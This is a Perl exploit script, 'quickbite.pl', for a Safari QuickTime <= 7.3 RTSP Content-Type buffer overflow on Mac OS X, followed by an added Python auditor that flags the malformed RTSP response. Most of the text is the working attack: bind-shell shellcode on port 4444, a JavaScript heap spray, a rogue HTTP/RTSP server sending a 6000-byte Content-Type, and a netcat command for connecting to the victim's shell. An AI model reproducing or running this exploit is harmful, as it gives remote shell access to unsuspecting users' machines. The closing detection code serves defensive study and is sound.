Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit (quickbite.pl)
#!/usr/bin/perl
#
# quickbite.pl
#
# Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit
# for Mac OS X (Intel)
#
# Tested with OS X 10.4.
# On victim, browse to http://server:8080/
# Binds shell on port 4444.
#
# by krafty
#
# greets to sk, halvar, grugq, and all the ethical hackers
# extra thanks to ddz for osx hackery
# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc
# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
# milw0rm and packetstorm rule
# Bring back the days of technotronic and r00tshell! Freedom.
#
# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:
# "What's worse than biting into an apple and finding a worm?"
# "Finding half a worm".

use Socket;
use IO::Handle;

use constant MY_HTTP_PORT => 8080;

# OS X/x86 bind shell (TCP 4444), in the %uXXXX form that JavaScript unescape() expands
$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";

# Oversized Content-Type value. 0x11 bytes overwrite the saved pointer with
# 0x11111111, which is meant to land in the NOP sled sprayed by the page below.
$buf = chr(0x11) x 6000;

# don't touch anything below this line

# Page served on the first (HTTP) connection: heap spray, then an EMBED that
# makes QuickTime open an RTSP URL pointing back at this server.
$html = <<ENDHTML;
<script>
var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");
var shellcode = unescape("$shellcode");
shellcode = prefix + shellcode;
// NOP sled, doubled until it is 0xc0000 UTF-16 code units long
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
	spray += spray;
} while(spray.length < 0xc0000);
// heap spray: 50 blocks of sled + shellcode
memory = new Array();
for(i = 0; i < 50; i++)
	memory[i] = spray + shellcode;
var url = "rtsp://" + location.host + "/x.mp3";
document.write("<EMBED SRC='" + url + "' TYPE='video/quicktime' AUTOPLAY='true' />");
</script>
ENDHTML

# SDP body of the RTSP DESCRIBE reply
$rtsp_body =
	"v=0\r\n" .
	"o=- 16689332712 1 IN IP4 0.0.0.0\r\n" .
	"s=MPEG-1 or 2 Audio\r\n" .
	"i=1.mp3\r\n" .
	"t=0 0\r\n" .
	"a=tool:hello\r\n" .
	"a=type:broadcast\r\n" .
	"a=control:*\r\n" .
	"a=range:npt=0-213.077\r\n" .
	"a=x-qt-text-nam:MPEG-1 or 2 Audio\r\n" .
	"a=x-qt-text-inf:1.mp3\r\n" .
	"m=audio 0 RTP/AVP 14\r\n" .
	"c=IN IP4 0.0.0.0\r\n" .
	"a=control:track1\r\n";

$content_length = length($rtsp_body);

$rtsp_header =
	"RTSP/1.0 200 OK\r\n" .
	"CSeq: 1\r\n" .
	"Date: 0x00 :P\r\n" .
	"Content-Base: rtsp://0.0.0.0/x.mp3/\r\n" .
	"Content-Type: $buf\r\n" .                  # the header that overflows
	"Content-Length: $content_length\r\n\r\n";

$rtsp = $rtsp_header . $rtsp_body;

$http_header = "HTTP/1.1 200 OK\nContent-type: text/html\n\n";

$| = 1;

my $port = MY_HTTP_PORT;
my $protocol = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in($port,INADDR_ANY);
bind(SOCK,$my_addr) or die "bind() failed: $!";
listen(SOCK,SOMAXCONN) or die "listen() failed: $!";
warn "waiting for incoming connections on port $port...\n";

# One port serves both protocols: plain HTTP requests get the spray page,
# the RTSP DESCRIBE that QuickTime sends back gets the overflow, then we stop.
$repeat = 1;
$victim = inet_aton("0.0.0.0");
while($repeat) {
	next unless my $remote_addr = accept(SESSION,SOCK);
	my ($port,$hisaddr) = sockaddr_in($remote_addr);
	warn "Connection from [",inet_ntoa($hisaddr),",$port]\n";
	$victim = $hisaddr;
	SESSION->autoflush(1);
	$request = "";
	while(<SESSION>) {
		$request_line = $_;
		$request .= $request_line;
		chomp($request_line);
		if($request_line =~ /DESCRIBE rtsp/) {
			$repeat = 0;
		}
		$x = length($request_line);
		if($x <= 1) {    # blank line (only "\r" left after chomp) ends the request
			last;
		}
	}
	print STDERR $request;
	if($repeat) {
		print SESSION $http_header . $html;
	}
	else {
		print SESSION $rtsp;
	}
	warn "Connection from [",inet_ntoa($hisaddr),",$port] finished\n";
	close SESSION;
}

print "Connect to ".inet_ntoa($victim).":4444 after 5 seconds\n";
print "nc -nvv ".inet_ntoa($victim)." 4444\nEnjoy!\n";
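The response this script sends is easy to recognise on the wire: where a media type such as application/sdp belongs, the Content-Type header carries thousands of bytes of the control character 0x11. The Python below is an added example, not code from quickbite.pl or from the original page: a small RTSP response auditor that parses the status line, headers and body and flags oversized values, non-printable bytes, an invalid media type and a Content-Length that disagrees with the body. The 512-byte value limit is an assumption chosen here, not a figure from any RTSP or QuickTime specification, and the two sample responses are constructed inline to mirror the $rtsp that the script builds.

```python
"""
RTSP response auditor: flags oversized or malformed header values such as the
6000-byte Content-Type that quickbite.pl sends. Added example, not code from
quickbite.pl or the original page.
"""
import re
from typing import Dict, List, Tuple

# Assumption (not from any spec): no legitimate RTSP header value needs more than this.
MAX_HEADER_VALUE = 512

# RFC 2045 token characters (no CTLs, SPACE or tspecials);
# a media type is token "/" token, optionally followed by ";" parameters.
_TOKEN = r"[!#$%&'*+.0-9A-Z^_`a-z{|}~-]+"
_MEDIA_TYPE_RE = re.compile(rf"^{_TOKEN}/{_TOKEN}(\s*;.*)?$")
_STATUS_RE = re.compile(r"^RTSP/\d\.\d \d{3}( .*)?$")


def parse_rtsp_response(raw: bytes) -> Tuple[str, Dict[str, bytes], bytes]:
    """Split a raw RTSP response into (status line, {lowercased name: value}, body).

    Header values stay as bytes so control characters survive for inspection.
    Raises ValueError on framing errors (no CRLFCRLF terminator, header without a colon).
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("response has no end-of-headers CRLFCRLF")
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers: Dict[str, bytes] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise ValueError(f"malformed header line: {line[:40]!r}")
        headers[name.strip().lower().decode("latin-1")] = value.strip()
    return status, headers, body


def audit_rtsp_response(raw: bytes, max_value: int = MAX_HEADER_VALUE) -> List[str]:
    """Return the findings for one RTSP response; an empty list means nothing suspicious."""
    findings: List[str] = []
    status, headers, body = parse_rtsp_response(raw)

    if not _STATUS_RE.match(status):
        findings.append(f"unexpected status line {status[:40]!r}")

    for name, value in headers.items():
        if len(value) > max_value:
            findings.append(f"oversized header {name}: {len(value)} bytes (limit {max_value})")
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append(f"non-printable bytes in header {name}")

    ct = headers.get("content-type")
    if ct is not None and not _MEDIA_TYPE_RE.match(ct.decode("latin-1")):
        findings.append("content-type is not a valid media type")

    cl = headers.get("content-length")
    if cl is not None and (not cl.isdigit() or int(cl) != len(body)):
        findings.append(f"content-length {cl!r} does not match body of {len(body)} bytes")

    return findings


def build_sample_response(content_type: str) -> bytes:
    """Constructed sample mirroring the $rtsp_header and $rtsp_body that quickbite.pl sends."""
    body = (
        b"v=0\r\n"
        b"o=- 16689332712 1 IN IP4 0.0.0.0\r\n"
        b"s=MPEG-1 or 2 Audio\r\n"
        b"m=audio 0 RTP/AVP 14\r\n"
        b"c=IN IP4 0.0.0.0\r\n"
        b"a=control:track1\r\n"
    )
    header = (
        "RTSP/1.0 200 OK\r\n"
        "CSeq: 1\r\n"
        "Content-Base: rtsp://0.0.0.0/x.mp3/\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode("latin-1")
    return header + body


# The exploit's value (chr(0x11) x 6000) next to what a genuine DESCRIBE reply carries.
QUICKBITE_RESPONSE = build_sample_response("\x11" * 6000)
BENIGN_RESPONSE = build_sample_response("application/sdp")

if __name__ == "__main__":
    for label, sample in (("quickbite", QUICKBITE_RESPONSE), ("benign", BENIGN_RESPONSE)):
        print(label, audit_rtsp_response(sample) or "no findings")
```

Run against the constructed samples, the quickbite response produces three findings (oversized header, non-printable bytes, invalid media type) and the benign one produces none. Keeping header values as bytes rather than decoding them early is deliberate: a decoder that silently replaced the 0x11 bytes would hide exactly the evidence this check looks for.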
